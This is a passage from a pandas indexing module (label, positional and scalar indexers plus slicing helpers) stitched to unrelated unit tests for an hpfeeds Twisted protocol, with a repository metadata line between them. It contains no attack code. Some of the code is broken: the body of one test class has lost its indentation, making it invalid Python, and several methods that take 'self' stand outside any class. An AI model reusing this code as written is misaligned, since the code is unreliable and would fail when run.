                result = self.obj.reindex_axis(keyarr, axis=axis, level=level)
                # this is an error as we are trying to find
                # keys in a multi-index that don't exist
                if isinstance(labels, MultiIndex) and level is not None:
                    if hasattr(result,'ndim') and not np.prod(result.shape) and len(keyarr):
                        raise KeyError("cannot index a multi-index axis with these keys")
                return result
            except AttributeError:
                # Series
                if axis != 0:
                    raise AssertionError('axis must be 0')
                return self.obj.reindex(keyarr, level=level)
        # existing labels are non-unique
        else:
            # reindex with the specified axis
            if axis + 1 > self.obj.ndim:
                raise AssertionError("invalid indexing error with "
                                     "non-unique index")
            new_target, indexer, new_indexer = labels._reindex_non_unique(keyarr)
            if new_indexer is not None:
                # some keys were missing: take the found ones, then
                # reindex so missing keys appear with NA values
                result = self.obj.take(indexer[indexer!=-1], axis=axis,
                                       convert=False)
                result = result._reindex_with_indexers({
                    axis: [new_target, new_indexer]
                }, copy=True, allow_dups=True)
            else:
                result = self.obj.take(indexer, axis=axis,
                                       convert=False)
            return result
def _convert_to_indexer(self, obj, axis=0, is_setter=False):
    """
    Convert indexing key into something we can use to do actual fancy
    indexing on an ndarray
    Examples
    ix[:5] -> slice(0, 5)
    ix[[1,2,3]] -> [1,2,3]
    ix[['foo', 'bar', 'baz']] -> [i, j, k] (indices of foo, bar, baz)
    Going by Zen of Python?
    "In the face of ambiguity, refuse the temptation to guess."
    raise AmbiguousIndexError with integer labels?
    - No, prefer label-based indexing

    A ``{'key': obj}`` dict return signals a missing key that a setter
    is allowed to create (see convert_missing_indexer).
    """
    labels = self.obj._get_axis(axis)
    # if we are a scalar indexer and not type correct raise
    obj = self._convert_scalar_indexer(obj, axis)
    # see if we are positional in nature
    is_int_index = labels.is_integer()
    is_int_positional = is_integer(obj) and not is_int_index
    # if we are a label return me
    try:
        return labels.get_loc(obj)
    except LookupError:
        if isinstance(obj, tuple) and isinstance(labels, MultiIndex):
            if is_setter and len(obj) == labels.nlevels:
                return {'key': obj}
            raise
    except TypeError:
        pass
    except (ValueError):
        if not is_int_positional:
            raise
    # a positional
    if is_int_positional:
        # if we are setting and its not a valid location
        # its an insert which fails by definition
        if is_setter:
            # always valid
            if self.name == 'loc':
                return {'key': obj}
            # a positional
            if (obj >= self.obj.shape[axis] and
                    not isinstance(labels, MultiIndex)):
                raise ValueError("cannot set by positional indexing with "
                                 "enlargement")
        return obj
    if isinstance(obj, slice):
        return self._convert_slice_indexer(obj, axis)
    elif is_nested_tuple(obj, labels):
        return labels.get_locs(obj)
    elif is_list_like_indexer(obj):
        if is_bool_indexer(obj):
            obj = check_bool_indexer(labels, obj)
            inds, = obj.nonzero()
            return inds
        else:
            if isinstance(obj, Index):
                objarr = obj.values
            else:
                objarr = _asarray_tuplesafe(obj)
            # The index may want to handle a list indexer differently
            # by returning an indexer or raising
            indexer = labels._convert_list_indexer(objarr, kind=self.name)
            if indexer is not None:
                return indexer
            # this is not the most robust, but...
            if (isinstance(labels, MultiIndex) and
                    not isinstance(objarr[0], tuple)):
                level = 0
                _, indexer = labels.reindex(objarr, level=level)
                # take all
                if indexer is None:
                    indexer = np.arange(len(labels))
                # validate membership on the first level only
                check = labels.levels[0].get_indexer(objarr)
            else:
                level = None
                # unique index
                if labels.is_unique:
                    indexer = check = labels.get_indexer(objarr)
                # non-unique (dups)
                else:
                    (indexer,
                     missing) = labels.get_indexer_non_unique(objarr)
                    check = indexer
            # -1 marks keys that were not found
            mask = check == -1
            if mask.any():
                raise KeyError('%s not in index' % objarr[mask])
            return _values_from_object(indexer)
    else:
        try:
            return labels.get_loc(obj)
        except LookupError:
            # allow a not found key only if we are a setter
            if not is_list_like_indexer(obj) and is_setter:
                return {'key': obj}
            raise
def _tuplify(self, loc):
    """Expand a single axis-0 locator into a full-rank indexing tuple,
    padding the remaining ``self.ndim - 1`` axes with full slices."""
    return (loc,) + (slice(None, None),) * (self.ndim - 1)
def _get_slice_axis(self, slice_obj, axis=0):
    """Slice ``self.obj`` along ``axis``; an all-default slice returns
    the object unchanged."""
    if not need_slice(slice_obj):
        return self.obj
    indexer = self._convert_slice_indexer(slice_obj, axis)
    if isinstance(indexer, slice):
        return self._slice(indexer, axis=axis, kind='iloc')
    # converter produced positions rather than a slice
    return self.obj.take(indexer, axis=axis, convert=False)
class _IXIndexer(_NDFrameIndexer):
    """A primarily label-location based indexer, with integer position
    fallback.
    ``.ix[]`` supports mixed integer and label based access. It is
    primarily label based, but will fall back to integer positional
    access unless the corresponding axis is of integer type.
    ``.ix`` is the most general indexer and will support any of the
    inputs in ``.loc`` and ``.iloc``. ``.ix`` also supports floating
    point label schemes. ``.ix`` is exceptionally useful when dealing
    with mixed positional and label based hierachical indexes.
    However, when an axis is integer based, ONLY label based access
    and not positional access is supported. Thus, in such cases, it's
    usually better to be explicit and use ``.iloc`` or ``.loc``.
    See more at :ref:`Advanced Indexing <advanced>`.
    """
    def _has_valid_type(self, key, axis):
        # slices, boolean masks and list-likes are always acceptable to
        # .ix; any other key must survive scalar conversion, which
        # raises for invalid keys
        if not (isinstance(key, slice) or is_bool_indexer(key)
                or is_list_like_indexer(key)):
            self._convert_scalar_indexer(key, axis)
        return True
class _LocationIndexer(_NDFrameIndexer):
    """Shared base for location-style indexers (``.loc``/``.iloc``).

    Subclasses implement ``_getitem_axis`` and set ``_exception`` to
    the error type surfaced on failed boolean selection.
    """
    # error type raised on failure; overridden by subclasses
    _exception = Exception
    def __getitem__(self, key):
        if type(key) is tuple:
            return self._getitem_tuple(key)
        else:
            return self._getitem_axis(key, axis=0)
    def _getitem_axis(self, key, axis=0):
        # abstract: subclasses must provide per-axis selection
        raise NotImplementedError()
    def _getbool_axis(self, key, axis=0):
        # select with an aligned boolean mask along `axis`
        labels = self.obj._get_axis(axis)
        key = check_bool_indexer(labels, key)
        inds, = key.nonzero()
        try:
            return self.obj.take(inds, axis=axis, convert=False)
        except Exception as detail:
            # re-wrap in the indexer-specific exception type
            raise self._exception(detail)
    def _get_slice_axis(self, slice_obj, axis=0):
        """ this is pretty simple as we just have to deal with labels """
        obj = self.obj
        if not need_slice(slice_obj):
            return obj
        labels = obj._get_axis(axis)
        indexer = labels.slice_indexer(slice_obj.start, slice_obj.stop,
                                       slice_obj.step)
        if isinstance(indexer, slice):
            return self._slice(indexer, axis=axis, kind='iloc')
        else:
            return self.obj.take(indexer, axis=axis, convert=False)
class _LocIndexer(_LocationIndexer):
    """Purely label-location based indexer for selection by label.
    ``.loc[]`` is primarily label based, but may also be used with a
    boolean array.
    Allowed inputs are:
    - A single label, e.g. ``5`` or ``'a'``, (note that ``5`` is
    interpreted as a *label* of the index, and **never** as an
    integer position along the index).
    - A list or array of labels, e.g. ``['a', 'b', 'c']``.
    - A slice object with labels, e.g. ``'a':'f'`` (note that contrary
    to usual python slices, **both** the start and the stop are included!).
    - A boolean array.
    ``.loc`` will raise a ``KeyError`` when the items are not found.
    See more at :ref:`Selection by Label <indexing.label>`
    """
    # human-readable description used in error messages
    _valid_types = ("labels (MUST BE IN THE INDEX), slices of labels (BOTH "
                    "endpoints included! Can be slices of integers if the "
                    "index is integers), listlike of labels, boolean")
    _exception = KeyError
    def _has_valid_type(self, key, axis):
        """Validate that ``key`` is usable for label indexing on ``axis``;
        raises KeyError/TypeError otherwise."""
        ax = self.obj._get_axis(axis)
        # valid for a label where all labels are in the index
        # slice of labels (where start-end in labels)
        # slice of integers (only if in the labels)
        # boolean
        if isinstance(key, slice):
            return True
        elif is_bool_indexer(key):
            return True
        elif is_list_like_indexer(key):
            # mi is just a passthru
            if isinstance(key, tuple) and isinstance(ax, MultiIndex):
                return True
            # TODO: don't check the entire key unless necessary
            if len(key) and np.all(ax.get_indexer_for(key) < 0):
                raise KeyError("None of [%s] are in the [%s]" %
                               (key, self.obj._get_axis_name(axis)))
            return True
        else:
            def error():
                # null keys get a TypeError, missing labels a KeyError
                if isnull(key):
                    raise TypeError(
                        "cannot use label indexing with a null key")
                raise KeyError("the label [%s] is not in the [%s]" %
                               (key, self.obj._get_axis_name(axis)))
            try:
                key = self._convert_scalar_indexer(key, axis)
                if not key in ax:
                    error()
            except (TypeError) as e:
                # python 3 type errors should be raised
                if 'unorderable' in str(e):  # pragma: no cover
                    error()
                raise
            except:
                error()
        return True
    def _getitem_axis(self, key, axis=0):
        """Label-based selection along one axis: slice, boolean mask,
        list-like (possibly MultiIndex tuple), or a single label."""
        labels = self.obj._get_axis(axis)
        if isinstance(key, slice):
            self._has_valid_type(key, axis)
            return self._get_slice_axis(key, axis=axis)
        elif is_bool_indexer(key):
            return self._getbool_axis(key, axis=axis)
        elif is_list_like_indexer(key):
            # GH 7349
            # possibly convert a list-like into a nested tuple
            # but don't convert a list-like of tuples
            if isinstance(labels, MultiIndex):
                if not isinstance(key, tuple) and len(key) > 1 and not isinstance(key[0], tuple):
                    key = tuple([key])
            # an iterable multi-selection
            if not (isinstance(key, tuple) and
                    isinstance(labels, MultiIndex)):
                if hasattr(key, 'ndim') and key.ndim > 1:
                    raise ValueError('Cannot index with multidimensional key')
                return self._getitem_iterable(key, axis=axis)
            # nested tuple slicing
            if is_nested_tuple(key, labels):
                locs = labels.get_locs(key)
                indexer = [ slice(None) ] * self.ndim
                indexer[axis] = locs
                return self.obj.iloc[tuple(indexer)]
        # fall thru to straight lookup
        self._has_valid_type(key, axis)
        return self._get_label(key, axis=axis)
class _iLocIndexer(_LocationIndexer):
    """Purely integer-location based indexing for selection by position.
    ``.iloc[]`` is primarily integer position based (from ``0`` to
    ``length-1`` of the axis), but may also be used with a boolean
    array.
    Allowed inputs are:
    - An integer, e.g. ``5``.
    - A list or array of integers, e.g. ``[4, 3, 0]``.
    - A slice object with ints, e.g. ``1:7``.
    - A boolean array.
    ``.iloc`` will raise ``IndexError`` if a requested indexer is
    out-of-bounds, except *slice* indexers which allow out-of-bounds
    indexing (this conforms with python/numpy *slice* semantics).
    See more at :ref:`Selection by Position <indexing.integer>`
    """
    # human-readable description used in error messages
    _valid_types = ("integer, integer slice (START point is INCLUDED, END "
                    "point is EXCLUDED), listlike of integers, boolean array")
    _exception = IndexError
    def _has_valid_type(self, key, axis):
        """Return True if ``key`` is positionally valid for ``axis``;
        raises for disallowed boolean masks or out-of-bounds keys."""
        if is_bool_indexer(key):
            if hasattr(key, 'index') and isinstance(key.index, Index):
                if key.index.inferred_type == 'integer':
                    raise NotImplementedError(
                        "iLocation based boolean indexing on an integer type "
                        "is not available"
                    )
                raise ValueError("iLocation based boolean indexing cannot use "
                                 "an indexable as a mask")
            return True
        if isinstance(key, slice):
            return True
        elif is_integer(key):
            return self._is_valid_integer(key, axis)
        elif is_list_like_indexer(key):
            return self._is_valid_list_like(key, axis)
        return False
    def _has_valid_setitem_indexer(self, indexer):
        self._has_valid_positional_setitem_indexer(indexer)
    def _is_valid_integer(self, key, axis):
        # return a boolean if we have a valid integer indexer
        # (negative keys are valid down to -len(axis))
        ax = self.obj._get_axis(axis)
        l = len(ax)
        if key >= l or key < -l:
            raise IndexError("single positional indexer is out-of-bounds")
        return True
    def _is_valid_list_like(self, key, axis):
        # return a boolean if we are a valid list-like (e.g. that we dont' have out-of-bounds values)
        # coerce the key to not exceed the maximum size of the index
        arr = np.array(key)
        ax = self.obj._get_axis(axis)
        l = len(ax)
        if len(arr) and (arr.max() >= l or arr.min() < -l):
            raise IndexError("positional indexers are out-of-bounds")
        return True
    def _getitem_tuple(self, tup):
        """Positional selection with a tuple of per-axis keys."""
        self._has_valid_tuple(tup)
        try:
            return self._getitem_lowerdim(tup)
        except:
            pass
        retval = self.obj
        axis=0
        for i, key in enumerate(tup):
            if i >= self.obj.ndim:
                raise IndexingError('Too many indexers')
            if is_null_slice(key):
                axis += 1
                continue
            retval = getattr(retval, self.name)._getitem_axis(key, axis=axis)
            # if the dim was reduced, then pass a lower-dim the next time
            if retval.ndim<self.ndim:
                axis -= 1
            # try to get for the next axis
            axis += 1
        return retval
    def _get_slice_axis(self, slice_obj, axis=0):
        # positional slicing along one axis; no-op slices return obj
        obj = self.obj
        if not need_slice(slice_obj):
            return obj
        slice_obj = self._convert_slice_indexer(slice_obj, axis)
        if isinstance(slice_obj, slice):
            return self._slice(slice_obj, axis=axis, kind='iloc')
        else:
            return self.obj.take(slice_obj, axis=axis, convert=False)
    def _getitem_axis(self, key, axis=0):
        """Positional selection along one axis: slice, boolean mask,
        list of ints, or a single int."""
        if isinstance(key, slice):
            self._has_valid_type(key, axis)
            return self._get_slice_axis(key, axis=axis)
        elif is_bool_indexer(key):
            self._has_valid_type(key, axis)
            return self._getbool_axis(key, axis=axis)
        # a single integer or a list of integers
        else:
            if is_list_like_indexer(key):
                # validate list bounds
                self._is_valid_list_like(key, axis)
                # force an actual list
                key = list(key)
            else:
                key = self._convert_scalar_indexer(key, axis)
                if not is_integer(key):
                    raise TypeError("Cannot index by location index with a "
                                    "non-integer key")
                # validate the location
                self._is_valid_integer(key, axis)
            return self._get_loc(key, axis=axis)
    def _convert_to_indexer(self, obj, axis=0, is_setter=False):
        """ much simpler as we only have to deal with our valid types """
        # make need to convert a float key
        if isinstance(obj, slice):
            return self._convert_slice_indexer(obj, axis)
        elif is_float(obj):
            return self._convert_scalar_indexer(obj, axis)
        elif self._has_valid_type(obj, axis):
            return obj
        raise ValueError("Can only index by location with a [%s]" %
                         self._valid_types)
class _ScalarAccessIndexer(_NDFrameIndexer):
    """ access scalars quickly """
    def _convert_key(self, key, is_setter=False):
        # base implementation: pass the key components through unchanged
        return list(key)
    def __getitem__(self, key):
        """Get a single scalar value; key must resolve to one element
        per axis."""
        if not isinstance(key, tuple):
            # we could have a convertible item here (e.g. Timestamp)
            if not is_list_like_indexer(key):
                key = tuple([key])
            else:
                raise ValueError('Invalid call for scalar access (getting)!')
        key = self._convert_key(key)
        return self.obj.get_value(*key, takeable=self._takeable)
    def __setitem__(self, key, value):
        """Set a single scalar value at the given full-rank key."""
        if not isinstance(key, tuple):
            # pad a single locator with full slices on remaining axes
            key = self._tuplify(key)
        if len(key) != self.obj.ndim:
            raise ValueError('Not enough indexers for scalar access '
                             '(setting)!')
        key = list(self._convert_key(key, is_setter=True))
        key.append(value)
        self.obj.set_value(*key, takeable=self._takeable)
class _AtIndexer(_ScalarAccessIndexer):
    """Fast label-based scalar accessor
    Similarly to ``loc``, ``at`` provides **label** based scalar lookups.
    You can also set using these indexers.
    """
    # label-based: get_value/set_value are called with takeable=False
    _takeable = False
    def _convert_key(self, key, is_setter=False):
        """ require the keys to be the same type as the index (so we don't fallback) """
        # allow arbitrary setting
        if is_setter:
            return list(key)
        # getters: enforce key/index type agreement per axis
        for ax, i in zip(self.obj.axes, key):
            if ax.is_integer():
                if not is_integer(i):
                    raise ValueError("At based indexing on an integer index can only have integer "
                                     "indexers")
            else:
                if is_integer(i):
                    raise ValueError("At based indexing on an non-integer index can only have non-integer "
                                     "indexers")
        return key
class _iAtIndexer(_ScalarAccessIndexer):
    """Fast integer location scalar accessor.
    Similarly to ``iloc``, ``iat`` provides **integer** based lookups.
    You can also set using these indexers.
    """
    # positional: get_value/set_value are called with takeable=True
    _takeable = True
    def _has_valid_setitem_indexer(self, indexer):
        self._has_valid_positional_setitem_indexer(indexer)
    def _convert_key(self, key, is_setter=False):
        """ require integer args (and convert to label arguments) """
        for a, i in zip(self.obj.axes, key):
            if not is_integer(i):
                raise ValueError("iAt based indexing can only have integer "
                                 "indexers")
        return key
# 32-bit floating point machine epsilon
# (used as the relative tolerance in is_index_slice when deciding
# whether a float slice bound is numerically an integer)
_eps = np.finfo('f4').eps
def length_of_indexer(indexer, target=None):
    """return the length of a single non-tuple indexer which could be a slice

    Parameters
    ----------
    indexer : slice, sequence, ndarray, Index, or scalar
    target : sequence, optional
        the object being indexed; required to resolve a slice

    Returns
    -------
    int : number of elements the indexer selects

    Raises
    ------
    AssertionError : if the length cannot be determined
    """
    if target is not None and isinstance(indexer, slice):
        # let slice.indices normalize None / negative / out-of-bounds
        # bounds; this also fixes the previous mis-count for negative
        # steps (e.g. slice(5, 1, -1) used to come out negative)
        start, stop, step = indexer.indices(len(target))
        if step > 0:
            return max(0, (stop - start + step - 1) // step)
        return max(0, (start - stop - step - 1) // (-step))
    elif isinstance(indexer, (ABCSeries, Index, np.ndarray, list)):
        return len(indexer)
    elif not is_list_like_indexer(indexer):
        # a scalar selects exactly one element
        return 1
    raise AssertionError("cannot find the length of the indexer")
def convert_to_index_sliceable(obj, key):
    """if we are index sliceable, then return my slicer, otherwise return None

    Strings are only treated as slicers when they are not a column name
    and the index is date-like.
    """
    idx = obj.index
    if isinstance(key, slice):
        return idx._convert_slice_indexer(key, kind='getitem')
    elif isinstance(key, compat.string_types):
        # we are an actual column
        if key in obj._data.items:
            return None
        # we need a timelike key here
        if idx.is_all_dates:
            try:
                return idx._get_string_slice(key)
            except:
                # the string did not parse as a date-like slice
                return None
    return None
def is_index_slice(obj):
    """Return True if slice ``obj`` has index-like bounds.

    A bound qualifies when it is None, an integer, or a float that is
    numerically a whole number; additionally at least one of start/stop
    must be supplied.
    """
    def _is_valid_index(x):
        # explicit parens: floats are accepted only when nearly integral
        return (is_integer(x) or
                (is_float(x) and np.allclose(x, int(x), rtol=_eps, atol=0)))
    def _crit(v):
        return v is None or _is_valid_index(v)
    if obj.start is None and obj.stop is None:
        return False
    return _crit(obj.start) and _crit(obj.stop)
def check_bool_indexer(ax, key):
    # boolean indexing, need to check that the data are aligned, otherwise
    # disallowed
    # this function assumes that is_bool_indexer(key) == True
    # returns a plain boolean ndarray aligned to `ax`
    result = key
    if isinstance(key, ABCSeries) and not key.index.equals(ax):
        # a misaligned Series mask must reindex cleanly (no NAs)
        result = result.reindex(ax)
        mask = com.isnull(result._values)
        if mask.any():
            raise IndexingError('Unalignable boolean Series key provided')
        result = result.astype(bool)._values
    else:
        # is_bool_indexer has already checked for nulls in the case of an
        # object array key, so no check needed here
        result = np.asarray(result, dtype=bool)
    return result
def convert_missing_indexer(indexer):
    """ reverse convert a missing indexer, which is a dict
    return the scalar indexer and a boolean indicating if we converted """
    if not isinstance(indexer, dict):
        return indexer, False
    # a missing key (but not a tuple indexer)
    key = indexer['key']
    if isinstance(key, bool):
        raise KeyError("cannot use a single bool to index into setitem")
    return key, True
def convert_from_missing_indexer_tuple(indexer, axes):
    """ create a filtered indexer that doesn't have any missing indexers """
    def _resolve(pos, idx):
        # dict entries wrap a missing key: translate it to a location
        # on the matching axis; everything else passes through
        if isinstance(idx, dict):
            return axes[pos].get_loc(idx['key'])
        return idx
    return tuple(_resolve(pos, idx) for pos, idx in enumerate(indexer))
def maybe_convert_indices(indices, n):
    """ if we have negative indices, translate to positive here
    if we have indices that are out-of-bounds, raise an IndexError

    Parameters
    ----------
    indices : list or ndarray of integer positions
    n : int, length of the axis being indexed

    Returns
    -------
    ndarray of non-negative, in-bounds positions

    Raises
    ------
    IndexError : if any index is out of bounds for length ``n``
    """
    if isinstance(indices, list):
        indices = np.array(indices)
        if len(indices) == 0:
            # If list is empty, np.array will return float and cause indexing
            # errors.
            return np.empty(0, dtype=np.int_)
    mask = indices < 0
    if mask.any():
        # copy before shifting so a caller-supplied ndarray is not
        # mutated in place
        indices = indices.copy()
        indices[mask] += n
    mask = (indices >= n) | (indices < 0)
    if mask.any():
        raise IndexError("indices are out-of-bounds")
    return indices
def maybe_convert_ix(*args):
    """
    We likely want to take the cross-product
    """
    # only form the open mesh when every argument is array-like;
    # otherwise hand the arguments back unchanged
    if all(isinstance(arg, (np.ndarray, list, ABCSeries, Index))
           for arg in args):
        return np.ix_(*args)
    return args
def is_nested_tuple(tup, labels):
    """Return True when ``tup`` is a tuple containing a nested
    tuple/list/slice component and ``labels`` is a MultiIndex."""
    if not isinstance(tup, tuple):
        return False
    # a nested component only matters against a MultiIndex
    return (any(isinstance(k, (tuple, list, slice)) for k in tup)
            and isinstance(labels, MultiIndex))
def is_list_like_indexer(key):
    """True for list-likes usable as indexers; tuple *subclasses*
    (e.g. namedtuples) are excluded because they can be label keys."""
    if isinstance(key, tuple) and type(key) is not tuple:
        return False
    return is_list_like(key)
def is_label_like(key):
    """True when ``key`` selects a single label: not a slice and not
    list-like."""
    if isinstance(key, slice):
        return False
    return not is_list_like_indexer(key)
def need_slice(obj):
    """Return True unless ``obj`` is a no-op slice (default bounds and
    a step of None or 1)."""
    if obj.start is not None or obj.stop is not None:
        return True
    return obj.step is not None and obj.step != 1
def maybe_droplevels(index, key):
    """Drop one index level per component of ``key`` (tuple keys) or a
    single level (scalar keys).

    Never raises: if a tuple key would drop too many levels the
    *original* index is returned unchanged; for a scalar key a failed
    drop is simply ignored.

    The previous bare ``except:`` clauses also swallowed
    KeyboardInterrupt/SystemExit; they are narrowed to ``Exception``.
    """
    original_index = index
    if isinstance(key, tuple):
        for _ in key:
            try:
                index = index.droplevel(0)
            except Exception:
                # we have dropped too much, so back out
                return original_index
    else:
        try:
            index = index.droplevel(0)
        except Exception:
            pass
    return index
def _non_reducing_slice(slice_):
    """
    Ensure that a slice doesn't reduce to a Series or Scalar.
    Any user-passed `subset` should have this called on it
    to make sure we're always working with DataFrames.
    """
    # default to column slice, like DataFrame
    # ['A', 'B'] -> IndexSlices[:, ['A', 'B']]
    kinds = tuple(list(compat.string_types) +
                  [ABCSeries, np.ndarray, Index, list])
    if isinstance(slice_, kinds):
        slice_ = IndexSlice[:, slice_]
    def pred(part):
        # true when slice does *not* reduce
        return isinstance(part, slice) or com.is_list_like(part)
    if not com.is_list_like(slice_):
        if not isinstance(slice_, slice):
            # a 1-d slice, like df.loc[1]
            slice_ = [[slice_]]
        else:
            # slice(a, b, c)
            slice_ = [slice_]  # to tuplize later
    else:
        # wrap every reducing component in a list so it keeps its axis
        slice_ = [part if pred(part) else [part] for part in slice_]
    return tuple(slice_)
def _maybe_numeric_slice(df, slice_, include_bool=False):
    """
    want nice defaults for background_gradient that don't break
    with non-numeric data. But if slice_ is passed go with that.
    """
    if slice_ is not None:
        return slice_
    # default: every numeric column, optionally booleans as well
    dtypes = [np.number, bool] if include_bool else [np.number]
    return IndexSlice[:, df.select_dtypes(include=dtypes).columns]
| Vvucinic/Wander | venv_2_7/lib/python2.7/site-packages/pandas/core/indexing.py | Python | artistic-2.0 | 64,500 |
import unittest
from hpfeeds.twisted import BaseProtocol, ClientProtocol
from .utils import mock
class TestTwistedBaseProtocol(unittest.TestCase):
    """Tests for BaseProtocol's outgoing side: the abstract on* hooks
    must raise NotImplementedError, and each sender helper must write
    the exact framed hpfeeds message bytes to the transport."""
    def setUp(self):
        # fresh protocol with a mocked transport so writes can be inspected
        self.protocol = BaseProtocol()
        self.transport = self.patch_object(self.protocol, 'transport')
    def patch_object(self, *args, **kwargs):
        # mock.patch.object with automatic cleanup at test teardown
        patcher = mock.patch.object(*args, **kwargs)
        self.addCleanup(patcher.stop)
        return patcher.start()
    def test_onError(self):
        self.assertRaises(NotImplementedError, self.protocol.onError, 'error')
    def test_onInfo(self):
        self.assertRaises(NotImplementedError, self.protocol.onInfo, 'name', b'rand')
    def test_onAuth(self):
        self.assertRaises(NotImplementedError, self.protocol.onAuth, 'name', b'rand')
    def test_onPublish(self):
        self.assertRaises(NotImplementedError, self.protocol.onPublish, 'ident', 'chan', 'data')
    def test_onSubscribe(self):
        self.assertRaises(NotImplementedError, self.protocol.onSubscribe, 'ident', 'chan')
    def test_onUnsubscribe(self):
        self.assertRaises(NotImplementedError, self.protocol.onUnsubscribe, 'ident', 'chan')
    def test_error(self):
        # expected bytes: 4-byte length, opcode, then payload
        self.protocol.error('error')
        assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\n\x00error'
    def test_info(self):
        self.protocol.info('name', b'\x00' * 4)
        assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0e\x01\x04name\x00\x00\x00\x00'
    def test_auth(self):
        # the trailing bytes are the hash of the rand/secret pair
        self.protocol.auth(b'\x00' * 4, 'ident', 'secret')
        assert self.transport.write.call_args[0][0] == \
            b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
    def test_publish(self):
        self.protocol.publish('ident', 'chan', 'payload')
        assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x17\x03\x05ident\x04chanpayload'
    def test_subscribe(self):
        self.protocol.subscribe('ident', 'chan')
        assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0f\x04\x05identchan'
    def test_unsubscribe(self):
        self.protocol.unsubscribe('ident', 'chan')
        assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0f\x05\x05identchan'
    def test_protocolError(self):
        # smoke test: just asserts the call does not raise
        self.protocol.protocolError('reason')
class TestTwistedBaseProtocolDecoding(unittest.TestCase):
def setUp(self):
self.protocol = BaseProtocol()
self.onError = self.patch_object(self.protocol, 'onError')
self.onInfo = self.patch_object(self.protocol, 'onInfo')
self.onAuth = self.patch_object(self.protocol, 'onAuth')
self.onPublish = self.patch_object(self.protocol, 'onPublish')
self.onSubscribe = self.patch_object(self.protocol, 'onSubscribe')
self.onUnsubscribe = self.patch_object(self.protocol, 'onUnsubscribe')
self.protocolError = self.patch_object(self.protocol, 'protocolError')
self.transport = self.patch_object(self.protocol, 'transport')
def patch_object(self, *args, **kwargs):
patcher = mock.patch.object(*args, **kwargs)
self.addCleanup(patcher.stop)
return patcher.start()
def test_onError(self):
self.protocol.dataReceived(b'\x00\x00\x00\n\x00error')
assert self.onError.call_args[0][0] == 'error'
def test_onInfo(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0e\x01\x04name\x00\x00\x00\x00')
assert self.onInfo.call_args[0][0] == 'name'
assert self.onInfo.call_args[0][1] == b'\x00' * 4
def test_onAuth(self):
self.protocol.dataReceived(b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac')
assert self.onAuth.call_args[0][0] == 'ident'
assert self.onAuth.call_args[0][1] == b'\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
def test_onPublish(self):
self.protocol.dataReceived(b'\x00\x00\x00\x17\x03\x05ident\x04chanpayload')
assert self.onPublish.call_args[0][0] == 'ident'
assert self.onPublish.call_args[0][1] == 'chan'
assert self.onPublish.call_args[0][2] == b'payload'
def test_onSubscribe(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x04\x05identchan')
assert self.onSubscribe.call_args[0][0] == 'ident'
assert self.onSubscribe.call_args[0][1] == 'chan'
def test_onUnsubscribe(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x05\x05identchan')
assert self.onUnsubscribe.call_args[0][0] == 'ident'
assert self.onUnsubscribe.call_args[0][1] == 'chan'
def test_invalid_opcode(self):
# We test this seperately as the unpacker also enforces valid opcodes
# So normally this won't be hit.
self.protocol.messageReceived(77, b'\x05identchan')
assert self.protocolError.call_args[0][0] == 'Unknown message opcode: 77'
self.transport.loseConnection.assert_called_with()
    def test_invalid_opcode_2(self):
        # An unknown opcode in a framed message is rejected by the unpacker
        # and the connection is dropped.
        self.protocol.dataReceived(b'\x00\x00\x00\x0f\x06\x05identchan')
        assert self.protocolError.call_args[0][0] == 'Unknown opcode: 6'
        self.transport.loseConnection.assert_called_with()
    def test_invalid_size(self):
        # Frames larger than the configured maximum are rejected up front,
        # before any payload buffering happens.
        self.protocol.dataReceived(b'\x00\xff\xff\xff\x05\x05identchan')
        assert self.protocolError.call_args[0][0] == 'Message too big; op 5 ml: 16777215 max_ml: 1048576'
        self.transport.loseConnection.assert_called_with()
class TestTwistedClientProtocol(unittest.TestCase):
    """Tests for the Twisted hpfeeds client-side protocol."""
    def setUp(self):
        # Fresh protocol with a mocked factory supplying credentials, plus
        # patched collaborators so each test can inspect their calls.
        self.protocol = ClientProtocol()
        self.protocol.factory = mock.Mock()
        self.protocol.factory.ident = 'ident'
        self.protocol.factory.secret = 'secret'
        self.transport = self.patch_object(self.protocol, 'transport')
        self.connectionReady = self.patch_object(self.protocol, 'connectionReady')
        self.protocolError = self.patch_object(self.protocol, 'protocolError')
    def patch_object(self, *args, **kwargs):
        """Start a mock.patch.object patcher and stop it at test teardown."""
        patcher = mock.patch.object(*args, **kwargs)
        self.addCleanup(patcher.stop)
        return patcher.start()
    def test_connectionReady(self):
        # Smoke test: connectionReady must be callable without error.
        self.protocol.connectionReady()
    def test_onInfo(self):
        # A client should auto-reply to an OP_INFO, then call connectionReady.
        self.protocol.onInfo('hpfeeds', b'\x00' * 4)
        assert self.transport.write.call_args[0][0] == \
            b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
    def test_onAuth(self):
        ''' Client should never receive an OP_AUTH message - it is an error if it does '''
        self.protocol.dataReceived(b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac')
        assert self.protocolError.call_args[0][0] == 'Unexpected OP_AUTH'
        self.transport.loseConnection.assert_called_with()
    def test_onSubscribe(self):
        ''' Client should never receive an OP_SUBSCRIBE message - it is an error if it does '''
        self.protocol.dataReceived(b'\x00\x00\x00\x0f\x04\x05identchan')
        assert self.protocolError.call_args[0][0] == 'Unexpected OP_SUBSCRIBE'
        self.transport.loseConnection.assert_called_with()
    def test_onUnsubscribe(self):
        ''' Client should never receive an OP_UNSUBSCRIBE message - it is an error if it does '''
        self.protocol.dataReceived(b'\x00\x00\x00\x0f\x05\x05identchan')
        assert self.protocolError.call_args[0][0] == 'Unexpected OP_UNSUBSCRIBE'
